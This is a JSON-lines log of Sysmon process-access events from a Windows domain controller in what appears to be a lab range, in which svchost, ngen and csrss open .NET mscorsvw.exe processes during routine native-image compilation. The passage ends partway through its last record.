{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6935,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.543\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010C8070E00}\r\nTargetProcessId: 2188\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.543","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010C8070E00}","TargetProcessId":"2188","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6936,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.574\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010430B0E00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.574","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010430B0E00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6937,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.574\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010430B0E00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.574","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010430B0E00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6938,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010430B0E00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010430B0E00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6939,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.605\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010890E0E00}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.605","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010890E0E00}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6940,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.605\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010890E0E00}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.605","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010890E0E00}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6941,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010890E0E00}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010890E0E00}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6942,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.652\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001005120E00}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 